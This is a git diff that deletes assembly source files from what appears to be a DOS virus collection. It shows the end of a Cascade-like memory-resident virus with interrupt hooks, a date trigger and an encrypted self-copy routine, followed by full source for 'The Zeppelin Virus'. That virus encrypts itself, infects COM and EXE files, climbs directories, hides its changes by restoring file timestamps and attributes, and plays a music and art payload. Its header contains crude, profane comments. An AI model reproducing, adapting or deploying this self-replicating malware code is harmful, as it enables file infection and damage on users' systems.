AH,3EH ; Close handle function - INT 21H ; DOS service - MOV CX,F_ATTR ; Get old file attributes - TEST CL,7 ; System, read only or hidden? - JNZ I_2122 ; Branch if yes - TEST CL,20H ; Archive? - JNZ I_2124 ; Branch if yes -I_2122: MOV AX,4301H ; Set file attributes function - LDS DX,F_PATH ; Pathname pointer - INT 21H ; DOS service -I_2124: POP DS - POP ES - POP BP - POP DI - POP SI - POP DX - POP CX - POP BX - POP AX - POPF - JMP I_2102 ; Original interrupt 21H - - ; Create random number - -RNDNUM: PUSH DS - PUSH CS ; \ Set DS to CS - POP DS ; / - PUSH BX - PUSH CX - PUSH DX - PUSH AX ; Save multiplier - MOV CX,7 ; Seven words to move - MOV BX,OFFSET RANDOM+14 ; Last word of randomiser - PUSH [BX] ; Save last word -RND010: MOV AX,[BX-2] ; Get previous word - ADC [BX],AX ; Add to current word - DEC BX ; \ Address previous word - DEC BX ; / - LOOP RND010 ; Repeat for each word - POP AX ; Retrieve last word - ADC [BX],AX ; Add to first word - MOV DX,[BX] ; Get result - POP AX ; Recover multiplier - OR AX,AX ; Is there a multiplier? 
- JZ RND020 ; Branch if not - MUL DX ; Multiply random number -RND020: MOV AX,DX ; Move result - POP DX - POP CX - POP BX - POP DS - RET - - ; Copy system clock - -GETCLK: PUSH DS - PUSH ES - PUSH SI - PUSH DI - PUSH CX - PUSH CS ; \ Set ES to CS - POP ES ; / - MOV CX,0040H ; \ Set DS to system RAM - MOV DS,CX ; / - MOV DI,OFFSET RANDOM ; Randomizer work area - MOV SI,006CH ; Address system clock - MOV CX,8 ; Eight bytes to copy - CLD - REPZ MOVSW ; Copy system clock - POP CX - POP DI - POP SI - POP ES - POP DS - RET - - ; Get character and attributes - - ASSUME DS:CODE -GETCHA: PUSH SI - PUSH DS - PUSH DX - MOV AL,DH ; Get row number - MUL NUMCOL ; Number of visible columns - MOV DH,0 ; Clear top of register - ADD AX,DX ; Add column number - SHL AX,1 ; Multiply by two - ADD AX,VDURAM ; Add VDU display start address - MOV SI,AX ; Move character pointer - TEST C80_SW,0FFH ; Test 80 column text switch - MOV DS,RAM_SG ; Video RAM segment - JZ GTC030 ; Branch if switch off - MOV DX,03DAH ; VDU status register - CLI -GTC010: IN AL,DX ; Get VDU status - TEST AL,8 ; Is it frame flyback time - JNZ GTC030 ; Branch if yes - TEST AL,1 ; Test toggle bit - JNZ GTC010 ; Branch if on -GTC020: IN AL,DX ; Get VDU status - TEST AL,1 ; Test toggle bit - JZ GTC020 ; Branch if off -GTC030: LODSW ; Load character and attribute - STI - POP DX - POP DS - POP SI - RET - - ; Store character and attributes - -STOCHA: PUSH DI - PUSH ES - PUSH DX - PUSH BX - MOV BX,AX - MOV AL,DH ; Get row number - MUL NUMCOL ; Number of visible columns - MOV DH,0 ; Clear top of register - ADD AX,DX ; Add column number - SHL AX,1 ; Multiply by two - ADD AX,VDURAM ; Add VDU display start address - MOV DI,AX ; Move character pointer - TEST C80_SW,0FFH ; Test 80 column text switch - MOV ES,RAM_SG ; Video RAM segment - JZ STO030 ; Branch if switch off - MOV DX,03DAH ; VDU status register - CLI -STO010: IN AL,DX ; Get VDU status - TEST AL,8 ; Is it frame flyback time - JNZ STO030 ; Branch if yes - TEST AL,1 ; Test 
toggle bit - JNZ STO010 ; Branch if on -STO020: IN AL,DX ; Get VDU status - TEST AL,1 ; Test toggle bit - JZ STO020 ; Branch if off -STO030: MOV AX,BX - STOSB ; Store character and attribute - STI - POP BX - POP DX - POP ES - POP DI - RET - - ; Delay loop - -DELAY: PUSH CX -DEL010: PUSH CX - MOV CX,LOOPCT ; Get timed loop count -DEL020: LOOP DEL020 - POP CX - LOOP DEL010 - POP CX - RET - - ; Toggle speaker drive - -CH_SND: PUSH AX - IN AL,61H ; Get port B - XOR AL,2 ; Toggle speaker drive - AND AL,0FEH ; Switch off speaker modulate - OUT 61H,AL ; Rewrite port B - POP AX - RET - - ; Is character 0, 32 or 255? - -IGNORE: CMP AL,0 ; Is it a zero? - JE IGN010 ; Branch if yes - CMP AL,20H ; Is it a space? - JE IGN010 ; Branch if yes - CMP AL,0FFH ; Is it FF? - JE IGN010 ; Branch if yes - CLC - RET - -IGN010: STC - RET - - ; Graphic display character - -GRAPHD: CMP AL,0B0H ; Is it below 176? - JB GRA010 ; Branch if yes - CMP AL,0DFH ; Is it above 223? - JA GRA010 ; Branch if yes - STC - RET - -GRA010: CLC - RET - - ; Time one clock cycle - -TIMCYC: PUSH DS - MOV AX,0040H ; \ Set DS to system RAM - MOV DS,AX ; / - STI - ASSUME DS:RAM - MOV AX,BW046C ; Get low word of system clock -TIM010: CMP AX,BW046C ; Has clock changed? - JE TIM010 ; Branch if not - XOR CX,CX ; Clear register - MOV AX,BW046C ; Get low word of system clock -TIM020: INC CX ; Increment count - JZ TIM040 ; Branch if now zero - CMP AX,BW046C ; Has clock changed? 
- JE TIM020 ; Branch if not -TIM030: POP DS - ASSUME DS:NOTHING - MOV AX,CX ; Transfer count - XOR DX,DX ; Clear register - MOV CX,000FH ; \ Divide by 15 - DIV CX ; / - MOV LOOPCT,AX ; Save timed loop count - RET - -TIM040: DEC CX ; Set to minus one - JMP SHORT TIM030 - - ; Cascade display routine - - ASSUME DS:CODE -DISPLY: MOV NUMROW,18H ; Number of display rows - PUSH DS - MOV AX,0040H ; \ Set DS to system RAM - MOV DS,AX ; / - ASSUME DS:RAM - MOV AX,BW044E ; VDU display start address - POP DS - ASSUME DS:CODE - MOV VDURAM,AX ; Save VDU display start address - MOV DL,0FFH - MOV AX,1130H ; Get character generator information - MOV BH,0 ; Int 1FH vector - PUSH ES - PUSH BP - INT 10H ; VDU I/O - POP BP - POP ES - CMP DL,0FFH ; Is register unchanged? - JE DSP010 ; Branch if yes - MOV NUMROW,DL ; Number of display rows (EGA) -DSP010: MOV AH,0FH ; Get VDU parameters - INT 10H ; VDU I/O - MOV NUMCOL,AH ; Save number of columns - MOV C80_SW,0 ; Set off 80 column text switch - MOV RAM_SG,0B000H ; Video RAM segment - Mono - CMP AL,7 ; Mode 7? - JE DSP040 ; Branch if yes - JB DSP020 ; Branch if less - JMP DSP130 ; Switch off speaker and return - -DSP020: MOV RAM_SG,0B800H ; Video RAM segment - CMP AL,3 ; Display mode 3? - JA DSP040 ; Branch if above - CMP AL,2 ; Display mode 2? 
- JB DSP040 ; Branch if below - MOV C80_SW,1 ; Set on 80 column text switch - MOV AL,NUMROW ; Number of display rows - INC AL ; Number, not offset - MUL NUMCOL ; Number of visible columns - MOV NUMPOS,AX ; Save number of display positions - MOV AX,RANPOS ; Get number of lines to affect - CMP AX,NUMPOS ; Number of display positions - JBE DSP030 ; Branch if within range - MOV AX,NUMPOS ; Get number of display positions -DSP030: CALL RNDNUM ; Create random number - INC AX ; Add to random number - MOV SI,AX ; Use as count -DSP040: XOR DI,DI ; Set second count to zero -DSP050: INC DI ; Increment second count - MOV AX,NUMPOS ; Get number of display positions - SHL AX,1 ; Multiply by two - CMP DI,AX ; Has second count reached this? - JBE DSP060 ; Branch if not - JMP DSP130 ; Switch off speaker and return - -DSP060: OR SWITCH,2 ; Set on switch 2 - MOV AL,NUMCOL ; \ Number of visible columns - MOV AH,0 ; / is upper limit - CALL RNDNUM ; Create random number - MOV DL,AL ; Random column number - MOV AL,NUMROW ; \ Number of display rows - MOV AH,0 ; / is upper limit - CALL RNDNUM ; Create random number - MOV DH,AL ; Random row number - CALL GETCHA ; Get character and attributes - CALL IGNORE ; Is character 0, 32 or 255? - JB DSP050 ; Branch if yes - CALL GRAPHD ; Is it a graphic display character - JB DSP050 ; Branch if yes - MOV CURCHA,AL ; Save current character - MOV CURATT,AH ; Save current attributes - MOV CL,NUMROW ; Number of display rows - MOV CH,0 ; Column zero -DSP070: INC DH ; Next row - CMP DH,NUMROW ; Was that the last row? - JA DSP110 ; Branch if yes - CALL GETCHA ; Get character and attributes - CMP AH,CURATT ; Are attributes the same? - JNE DSP110 ; Branch if not - CALL IGNORE ; Is character 0, 32 or 255? - JB DSP090 ; Branch if yes -DSP080: CALL GRAPHD ; Is it a graphic display character - JB DSP110 ; Branch if yes - INC DH ; Next row - CMP DH,NUMROW ; Was that the last row? 
- JA DSP110 ; Branch if yes - CALL GETCHA ; Get character and attributes - CMP AH,CURATT ; Are attributes the same? - JNE DSP110 ; Branch if not - CALL IGNORE ; Is character 0, 32 or 255? - JNB DSP080 ; Branch if not - CALL CH_SND ; Toggle speaker drive - DEC DH ; Previous row - CALL GETCHA ; Get character and attributes - MOV CURCHA,AL ; Save current character - INC DH ; Next row -DSP090: AND SWITCH,0FDH ; Set off switch 2 - DEC DH ; Previous row - MOV AL,20H ; Replace character with space - CALL STOCHA ; Store character and attributes - INC DH ; Next row - MOV AL,CURCHA ; Get current character - CALL STOCHA ; Store character and attributes - JCXZ DSP100 ; Branch if end of count - CALL DELAY ; Delay loop - DEC CX ; Decrement count -DSP100: JMP SHORT DSP070 - -DSP110: TEST SWITCH,2 ; Test switch 2 - JZ DSP120 ; Branch if off - JMP DSP050 - -DSP120: CALL CH_SND ; Toggle speaker drive - DEC SI ; Subtract from count - JZ DSP130 ; Switch off speaker and return - JMP DSP040 - - ; Switch off speaker and return - -DSP130: IN AL,61H ; Get port B - AND AL,0FCH ; Switch off speaker - OUT 61H,AL ; Rewrite port B+ - RET - - ; Interrupt 1CH routine - - ASSUME DS:NOTHING -INT_1C: TEST SWITCH,9 ; No display or already active? 
- JNZ I_1C40 ; Branch if either are on - OR SWITCH,1 ; Set on Int 1CH active switch - DEC I1CCNT ; Subtract from Int 1CH count - JNZ I_1C30 ; Branch if not zero - PUSH DS - PUSH ES - PUSH CS ; \ Set DS to CS - POP DS ; / - PUSH CS ; \ Set ES to CS - POP ES ; / - ASSUME DS:CODE - PUSH AX - PUSH BX - PUSH CX - PUSH DX - PUSH SI - PUSH DI - PUSH BP - MOV AL,20H ; \ Signal end of interrupt - OUT 20H,AL ; / - MOV AX,I1CMAX ; Get Int 1CH random no maximum - CMP AX,0438H ; Is it 1080 or above - JNB I_1C10 ; Branch if yes - MOV AX,0438H ; Upper limit - 1080 -I_1C10: CALL RNDNUM ; Create random number - INC AX ; Add to random number - MOV I1CCNT,AX ; Reset Int 1CH count - MOV I1CMAX,AX ; Reset Int 1CH random no maximum - CALL DISPLY ; Cascade display routine - MOV AX,3 ; Upper limit - 3 - CALL RNDNUM ; Create random number - INC AX ; Add to random number - MUL RANPOS ; Multiply by num of lines to affect - JNB I_1C20 ; Is result more than a word? - MOV AX,-1 ; Set to maximum -I_1C20: MOV RANPOS,AX ; Save number of lines to affect - POP BP - POP DI - POP SI - POP DX - POP CX - POP BX - POP AX - POP ES - POP DS - ASSUME DS:NOTHING -I_1C30: AND SWITCH,0FEH ; Set off Int 1CH active switch -I_1C40: JMP I1CBIO ; Branch to original int 1CH - - ; Interrupt 28H routine - -INT_28: TEST SWITCH,8 ; Test No display switch - JZ I_2830 ; Branch if not - PUSH AX - PUSH CX - PUSH DX - MOV AH,2AH ; Get date function - INT 21H ; DOS service - CMP CX,07C4H ; Year 1988? - JB I_2820 ; Not yet - do nothing - JA I_2810 ; After 1988 - CMP DH,0AH ; October? 
- JB I_2820 ; Not yet - do nothing -I_2810: AND SWITCH,0F7H ; Set off No display switch -I_2820: POP DX - POP CX - POP AX -I_2830: JMP I28BIO ; Branch to original int 28H - - ; Copy virus to program - -CPYVIR: PUSH ES - PUSH BX - MOV AH,48H ; Allocate memory function - MOV BX,006BH ; Length of virus - INT 21H ; DOS service - POP BX - JNB CPY020 ; Branch if no error -CPY010: STC - POP ES - RET - -CPY020: MOV DB0100,1 ; Set encryption indicator - MOV ES,AX ; Set target segment to allocated - PUSH CS ; \ Set DS to CS - POP DS ; / - ASSUME DS:CODE - XOR DI,DI ; Start of allocated - MOV SI,OFFSET DB0100 ; Start of virus - MOV CX,VIRLEN ; Length of virus - CLD - REPZ MOVSB ; Copy virus - MOV DI,0023H ; Start of area to encrypt - MOV SI,OFFSET BP0030 ; Address of area - ADD SI,F_SIZ1 ; Length of target file - MOV CX,OFFSET ENDADR-BP0030 ; Length to encrypt -CPY030: XOR ES:[DI],SI ; \ Encrypt - XOR ES:[DI],CX ; / - INC DI ; \ Next address - INC SI ; / - LOOP CPY030 ; Repeat for all area - MOV DS,AX ; Allocated area segment - MOV AH,40H ; Write handle function - XOR DX,DX ; From start - MOV CX,VIRLEN ; Length of virus - INT 21H ; DOS service - PUSHF - PUSH AX - MOV AH,49H ; Free allocated memory function - INT 21H ; DOS service - POP AX - POPF - PUSH CS ; \ Set DS to CS - POP DS ; / - JB CPY010 ; Branch if error - CMP AX,CX ; Correct length written? - JNE CPY010 ; Branch if error - POP ES - CLC -CPY040: RET - -ENDADR EQU $ - -CODE ENDS - - END START - \ No newline at end of file diff --git a/0-9/1717 (6).ASM b/0-9/1717 (6).ASM deleted file mode 100755 index 8b8b1df..0000000 --- a/0-9/1717 (6).ASM +++ /dev/null 
@@ -1,664 +0,0 @@ -;************************************************************************** -; -;The Zeppelin Virus September 25, 1992 -;[MPC] Generated... -;Created by... pAgE -;As a TRiBuTe to John "back-beat" Bohnam, this "WEAK-DICK" ViRUS was made! -;Incidently. He died on this date in 1980! Got drunk and strangled on a -;CunT hAiR...oR wAs iT a tAmPoN???...Oh well, So goes RocK -n- RoLL... -;By the wAy<---That's whAt you sAy just beforE you bOrE the FuCK out of -;soMeoNe with anOthEr TRiViAl piEce of SHiT!!! These LiTTLe Up AnD LeTTeRS -;ThAt yA'll uSe, ArE a KicK.... -; -;Okay, enough anti-social, suicidal, satan, sputum...On with the ViRUS... -; GeT'S in ThE bl00d DoEsn't it?------->^^^^^ -; -;Here it is... -;It's not much, but in the hands off a knowledgeable Vx WRiTeR....... -;I'll keep workin' on it and see what I can do. In the mean time, have fun! -;I ReM'd out a lot of the ShIt iN here, So Joe LuNChmEaT doesn;t FrY hImSelF. -; -;But...If that's not good enough, well then - hEy! - BLoW mE! -; -;*************************************************************************** - -.model tiny ; Handy directive -.code ; Virus code segment - org 100h ; COM file starting IP - -id = 'IS' ; ID word for EXE infections -entry_point: db 0e9h,0,0 ; jmp decrypt - -decrypt: ; handles encryption and decryption -patch_startencrypt: - mov di,offset startencrypt ; start of decryption - mov si,(offset heap - offset startencrypt)/2 ; iterations -decrypt_loop: - db 2eh,81h,35h ; xor word ptr cs:[di], xxxx -decrypt_value dw 0 ; initialised at zero for null effect - inc di ; calculate new decryption location - inc di - dec si ; If we are not done, then - jnz decrypt_loop ; decrypt mo' -startencrypt: - call next ; calculate delta offset -next: - pop bp ; bp = IP next - sub bp,offset next ; bp = delta offset - - - cmp sp,id ; COM or EXE? 
- je restoreEXE -restoreCOM: - lea si,[bp+save3] - mov di,100h - push di ; For later return - movsb - jmp short restoreEXIT -restoreEXE: - push ds - push es - push cs ; DS = CS - pop ds - push cs ; ES = CS - pop es - lea si,[bp+jmpsave2] - lea di,[bp+jmpsave] - movsw - movsw - movsw -restoreEXIT: - movsw - - mov byte ptr [bp+numinfec],5 ; reset infection counter - - mov ah,1Ah ; Set new DTA - lea dx,[bp+newDTA] ; new DTA @ DS:DX - int 21h - - mov ah,47h ; Get current directory - mov dl,0 ; Current drive - lea si,[bp+origdir] ; DS:SI->buffer - int 21h - mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR - - mov ax,3524h ; Get int 24 handler - int 21h ; to ES:BX - mov word ptr [bp+oldint24],bx; Save it - mov word ptr [bp+oldint24+2],es - mov ah,25h ; Set new int 24 handler - lea dx,[bp+offset int24] ; DS:DX->new handler - int 21h - push cs ; Restore ES - pop es ; 'cuz it was changed - -dir_scan: ; "dot dot" traversal - lea dx,[bp+exe_mask] - call infect_mask - lea dx,[bp+com_mask] - call infect_mask - mov ah,3bh ; change directory - lea dx,[bp+dot_dot] ; "cd .." - int 21h - jnc dir_scan ; go back for mo! - -done_infections: - ;mov ah,2ah ; Get current date - ;int 21h - ;cmp dh,9 ; Check month - ;jb act_two - ;cmp dl,25 ; Check date - ;jb act_two - ;cmp cx,1992 ; Check year - ;jb act_two - ;cmp al,0 ; Check date of week - ;jb activate - - ;mov ah,2ch ; Get current time - ;int 21h - ;cmp dl,50 ; Check the percentage - jbe activate - -exit_virus: - mov ax,2524h ; Restore int 24 handler - lds dx,[bp+offset oldint24] ; to original - int 21h - push cs - pop ds - - mov ah,3bh ; change directory - lea dx,[bp+origdir-1] ; original directory - int 21h - - mov ah,1ah ; restore DTA to default - mov dx,80h ; DTA in PSP - cmp sp,id-4 ; EXE or COM? 
- jz returnEXE -returnCOM: - int 27h - retn ; 100h is on stack -returnEXE: - pop es - pop ds - int 21h - mov ax,es ; AX = PSP segment - add ax,10h ; Adjust for PSP - add word ptr cs:[bp+jmpsave+2],ax - add ax,word ptr cs:[bp+stacksave+2] - cli ; Clear intrpts for stack manipulation - mov sp,word ptr cs:[bp+stacksave] - mov ss,ax - sti - db 0eah ; jmp ssss:oooo -jmpsave dd ? ; Original CS:IP -stacksave dd ? ; Original SS:SP -jmpsave2 db ? ; Actually four bytes -save3 db 0cdh,20h,0 ; First 3 bytes of COM file -exe_mask db '*.exe',0 -com_mask db '*.com',0 -stacksave2 dd ? - -activate proc far - -start: - jmp short loc_1 - db 90h -data_2 db 0 -data_3 dw 216h - db 2 -data_4 dw 0 - db 'Ripped this Motherfucker off' - db 1Ah -data_5 db 'SHIT!!! Wont work....', 0Dh, 0Ah - db '$' -loc_1: - - mov ax,0003h ; stick 3 into ax. - int 10h ; Set up 80*25, text mode. Clear the screen, too. - mov ah,0Fh - int 10h ; Video display ah=functn 0Fh - ; get state, al=mode, bh=page - ; ah=columns on screen - mov bx,0B800h - cmp al,2 - je loc_2 ; Jump if equal - cmp al,3 - je loc_2 ; Jump if equal - mov data_2,0 - mov bx,0B000h - cmp al,7 - je loc_2 ; Jump if equal - mov dx,offset data_5 ; ('Unsupported Video Mode') - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - retn -loc_2: - mov es,bx - mov di,data_4 - mov si,offset data_6 - mov dx,3DAh - mov bl,9 - mov cx,data_3 - cld ; Clear direction - xor ax,ax ; Zero register - -locloop_4: - lodsb ; String [si] to al - cmp al,1Bh - jne loc_5 ; Jump if not equal - xor ah,80h - jmp short loc_20 -loc_5: - cmp al,10h - jae loc_8 ; Jump if above or = - and ah,0F0h - or ah,al - jmp short loc_20 -loc_8: - cmp al,18h - je loc_11 ; Jump if equal - jnc loc_12 ; Jump if carry=0 - sub al,10h - add al,al - add al,al - add al,al - add al,al - and ah,8Fh - or ah,al - jmp short loc_20 -loc_11: - mov di,data_4 - add di,data_1e - mov data_4,di - jmp short loc_20 -loc_12: - mov bp,cx - mov cx,1 - cmp al,19h - jne loc_13 ; Jump if 
not equal - lodsb ; String [si] to al - mov cl,al - mov al,20h ; ' ' - dec bp - jmp short loc_14 -loc_13: - cmp al,1Ah - jne loc_15 ; Jump if not equal - lodsb ; String [si] to al - dec bp - mov cl,al - lodsb ; String [si] to al - dec bp -loc_14: - inc cx -loc_15: - cmp data_2,0 - je loc_18 ; Jump if equal - mov bh,al - -locloop_16: - in al,dx ; port 3DAh, CGA/EGA vid status - rcr al,1 ; Rotate thru carry - jc locloop_16 ; Jump if carry Set -loc_17: - in al,dx ; port 3DAh, CGA/EGA vid status - and al,bl - jnz loc_17 ; Jump if not zero - mov al,bh - stosw ; Store ax to es:[di] - loop locloop_16 ; Loop if cx > 0 - - jmp short loc_19 -loc_18: - rep stosw ; Rep when cx >0 Store ax to es:[di] -loc_19: - mov cx,bp -loc_20: - jcxz loc_new_25 ; Jump if cx=0 - loop locloop_4 ; Loop if cx > 0 -loc_new_25: - - - mov si,offset data00 ; SI points to data -get_note: mov bx,[si] ; Load BX with the frequency - or bx,bx ; Is BX equal to zero? - je play_tune_done ; If it is we are finished - - mov ax,034DDh ; - mov dx,0012h ; - cmp dx,bx ; - jnb new_note ; - div bx ; This bit here was stolen - mov bx,ax ; from the Turbo C++ v1.0 - in al,061h ; library file CS.LIB. I - test al,3 ; extracted sound() from the - jne skip_an_or ; library and linked it to - or al,3 ; an .EXE file, then diassembled - out 061h,al ; it. Basically this turns - mov al,0B6h ; on the speaker at a certain - out 043h,al ; frequency. -skip_an_or: mov al,bl ; - out 042h,al ; - mov al,bh ; - out 042h,al ; - - mov bx,[si + 2] ; BX holds duration value - xor ah,ah ; BIOS get time function - int 1Ah - add bx,dx ; Add the time to the length -wait_loop: int 1Ah ; Get the time again (AH = 0) - cmp dx,bx ; Is the delay over? - jne wait_loop ; Repeat until it is - in al,061h ; Stolen from the nosound() - and al,0FCh ; procedure in Turbo C++ v1.0. - out 061h,al ; This turns off the speaker. 
- -new_note: add si,4 ; SI points to next note - jmp short get_note ; Repeat with the next note -play_tune_done: -activate endp - - jmp exit_virus - -creator db '[pAgE]',0 ; YOU REALLY SHOULD TAKE THIS -virusname db '[SwanSong]',0 ; BULLSHIT OUT OF HERE!!! -author db 'pAgE',0 ; WHY NOT HOLD UP A SIGN!!! - -infect_mask: - mov ah,4eh ; find first file - mov cx,7 ; any attribute -findfirstnext: - int 21h ; DS:DX points to mask - jc exit_infect_mask ; No mo files found - - mov al,0h ; Open read only - call open - - mov ah,3fh ; Read file to buffer - lea dx,[bp+buffer] ; @ DS:DX - mov cx,20h ; 1Ah bytes - int 21h - - mov ah,3eh ; Close file - int 21h - - cmp word ptr [bp+buffer],'ZM'; EXE? - jz checkEXE ; Why yes, yes it is! -checkCOM: - mov ax,word ptr [bp+newDTA+1ah] ; Filesize in DTA - cmp ax,(heap-decrypt) ; Is it too small? - jb find_next - - mov bx,word ptr [bp+buffer+1] ;get jmp location - add bx,(heap-decrypt+1) ; Adjust for virus size - cmp ax,bx - je find_next ; already infected - jmp infect_com -checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? 
- jnz infect_exe -find_next: - mov ah,4fh ; find next file - jmp short findfirstnext -exit_infect_mask: ret - -infect_exe: - les ax, dword ptr [bp+buffer+14h] ; Save old entry point - mov word ptr [bp+jmpsave2], ax - mov word ptr [bp+jmpsave2+2], es - - les ax, dword ptr [bp+buffer+0Eh] ; Save old stack - mov word ptr [bp+stacksave2], es - mov word ptr [bp+stacksave2+2], ax - - mov ax, word ptr [bp+buffer + 8] ; Get header size - mov cl, 4 ; convert to bytes - shl ax, cl - xchg ax, bx - - les ax, [bp+offset newDTA+26]; Get file size - mov dx, es ; to DX:AX - push ax - push dx - - sub ax, bx ; Subtract header size from - sbb dx, 0 ; file size - - mov cx, 10h ; Convert to segment:offset - div cx ; form - - mov word ptr [bp+buffer+14h], dx ; New entry point - mov word ptr [bp+buffer+16h], ax - - mov word ptr [bp+buffer+0Eh], ax ; and stack - mov word ptr [bp+buffer+10h], id - - pop dx ; get file length - pop ax - - add ax,(heap-decrypt) ; add virus size - adc dx, 0 - - mov cl, 9 - push ax - shr ax, cl - ror dx, cl - stc - adc dx, ax - pop ax - and ah, 1 ; mod 512 - - mov word ptr [bp+buffer+4], dx ; new file size - mov word ptr [bp+buffer+2], ax - - push cs ; restore ES - pop es - - push word ptr [bp+buffer+14h] ; needed later - mov cx, 1ah - jmp short finishinfection -infect_com: ; ax = filesize - mov cx,3 - sub ax,cx - lea si,[bp+offset buffer] - lea di,[bp+offset save3] - movsw - movsb - mov byte ptr [si-3],0e9h - mov word ptr [si-2],ax - add ax,103h - push ax ; needed later -finishinfection: - push cx ; Save # bytes to write - xor cx,cx ; Clear attributes - call attributes ; Set file attributes - - mov al,2 - call open - - mov ah,40h ; Write to file - lea dx,[bp+buffer] ; Write from buffer - pop cx ; cx bytes - int 21h - - mov ax,4202h ; Move file pointer - xor cx,cx ; to end of file - cwd ; xor dx,dx - int 21h - -get_encrypt_value: - mov ah,2ch ; Get current time - int 21h ; dh=sec,dl=1/100 sec - or dx,dx ; Check if encryption value = 0 - jz get_encrypt_value ; 
Get another if it is - mov [bp+decrypt_value],dx ; Set new encryption value - lea di,[bp+code_store] - mov ax,5355h ; push bp,push bx - stosw - lea si,[bp+decrypt] ; Copy encryption function - mov cx,startencrypt-decrypt ; Bytes to move - push si ; Save for later use - push cx - rep movsb - - lea si,[bp+write] ; Copy writing function - mov cx,endwrite-write ; Bytes to move - rep movsb - pop cx - pop si - pop dx ; Entry point of virus - push di - push si - push cx - rep movsb ; Copy decryption function - mov ax,5b5dh ; pop bx,pop bp - stosw - mov al,0c3h ; retn - stosb - - add dx,offset startencrypt - offset decrypt ; Calculate new - mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of - call code_store ; decryption - pop cx - pop di - pop si - rep movsb ; Restore decryption function - - mov ax,5701h ; Restore creation date/time - mov cx,word ptr [bp+newDTA+16h] ; time - mov dx,word ptr [bp+newDTA+18h] ; date - int 21h - - mov ah,3eh ; Close file - int 21h - - mov ch,0 - mov cl,byte ptr [bp+newDTA+15h] ; Restore original - call attributes ; attributes - - dec byte ptr [bp+numinfec] ; One mo infection - jnz mo_infections ; Not enough - pop ax ; remove call from stack - jmp done_infections -mo_infections: jmp find_next - -open: - mov ah,3dh - lea dx,[bp+newDTA+30] ; filename in DTA - int 21h - xchg ax,bx - ret - -attributes: - mov ax,4301h ; Set attributes to cx - lea dx,[bp+newDTA+30] ; filename in DTA - int 21h - ret - -write: - pop bx ; Restore file handle - pop bp ; Restore relativeness - mov ah,40h ; Write to file - lea dx,[bp+decrypt] ; Concatenate virus - mov cx,(heap-decrypt) ; # bytes to write - int 21h - push bx - push bp -endwrite: - -int24: ; New int 24h (error) handler - mov al,3 ; Fail call - iret ; Return control -data00 dw 2000,8,2500,8,2000,14,2500,14 - dw 2500,14,3000,4,4000,24,3500,12,4000,6 - dw 3500,12,4000,4,4500,10,5000,4 - dw 5500,15,3000,8,3500,20,3000,8,3500,50 - dw 2000,8,2500,8,2000,14,2500,14 - dw 
2500,14,3000,4,4000,24,3500,12,4000,6 - dw 3500,12,4000,4,4500,10,5000,4 - dw 5500,15,3000,8,3500,20,3000,8,3500,50 - dw 2000,8,2500,8,2000,14,2500,14 - dw 2500,14,3000,4,4000,24,3500,12,4000,6 - dw 3500,12,4000,4,4500,10,5000,4 - dw 5500,15,3000,8,3500,20,3000,8,3500,50 - dw 0 - -data_6 db 9 - db 10h, 19h, 45h, 18h, 19h, 1Bh - db 01h,0D5h,0CDh,0CDh,0B8h, 04h - db 0F3h, 09h,0A9h, 04h, 9Dh - db 9 - db 0AAh, 04h,0F2h, 01h,0D5h,0CDh - db 0CDh,0B8h, 19h, 1Ch, 18h, 19h - db 12h,0D5h, 1Ah, 0Ah,0CDh,0BEh - db 20h, 09h, 5Ch, 04h,0F6h, 09h - db 2Fh, 20h, 01h,0D4h, 1Ah, 0Ah - db 0CDh,0B8h, 19h, 13h, 18h, 19h - db 03h,0C9h, 1Ah, 0Dh,0CDh,0BEh - db 19h, 03h, 0Fh,0D2h,0B7h, 19h - db 04h,0D6h, 1Ah, 03h,0C4h,0B7h - db 20h,0D2h,0D2h,0C4h,0C4h,0C4h - db 0B7h, 19h, 04h, 01h,0D4h, 1Ah - db 0Eh,0CDh,0BBh, 19h, 03h, 18h - db 19h, 03h,0BAh, 19h, 12h, 07h - db 0BAh,0BAh, 19h, 04h,0BAh, 19h - db 03h,0BDh, 20h,0BAh,0BAh, 19h - db 02h,0D3h,0B7h, 19h, 13h, 01h - db 0BAh, 19h, 03h, 18h, 19h, 03h - db 0BAh, 19h, 07h, 0Bh, 1Ah, 02h - db 04h, 19h, 07h, 08h,0BAh,0B6h - db 19h, 04h,0C7h,0C4h,0B6h, 19h - db 03h,0BAh,0B6h, 19h, 03h,0BAh - db 19h, 07h, 0Bh, 1Ah, 02h, 04h - db 19h, 08h, 01h,0BAh, 19h, 03h - db 18h,0D6h,0C4h,0C4h, 20h,0BAh - db 19h, 12h, 08h,0BAh,0D3h, 19h - db 02h,0B7h, 20h,0BAh, 19h, 03h - db 0B7h, 20h,0BAh,0D3h, 19h, 02h - db 0D6h,0BDh, 19h, 13h, 01h,0BAh - db 20h,0C4h,0C4h,0B7h, 18h,0D3h - db 0C4h,0C4h,0C4h,0BDh, 19h, 12h - db 08h,0D3h, 1Ah, 03h,0C4h,0BDh - db 20h,0D3h, 1Ah, 03h,0C4h,0BDh - db 20h,0D0h, 1Ah, 03h,0C4h,0BDh - db 19h, 14h, 01h,0D3h,0C4h,0C4h - db 0C4h,0BDh, 18h, 04h, 1Ah, 04h - db 3Eh, 19h, 03h, 0Fh,0D6h, 1Ah - db 04h,0C4h,0B7h, 20h,0D6h, 1Ah - db 03h,0C4h,0B7h, 20h,0D2h,0D2h - db 0C4h,0C4h,0C4h,0B7h, 20h,0D2h - db 0D2h,0C4h,0C4h,0C4h,0B7h, 20h - db 0D6h, 1Ah, 03h,0C4h,0B7h, 20h - db 0D2h,0B7h, 19h, 04h,0D2h, 20h - db 20h,0D2h,0D2h,0C4h,0C4h,0C4h - db 0B7h, 19h, 03h, 04h, 1Ah, 04h - db 3Ch, 18h, 01h,0D6h,0C4h,0C4h - db 0C4h,0B7h, 19h, 07h, 07h,0D6h - db 0C4h,0BDh - dd 
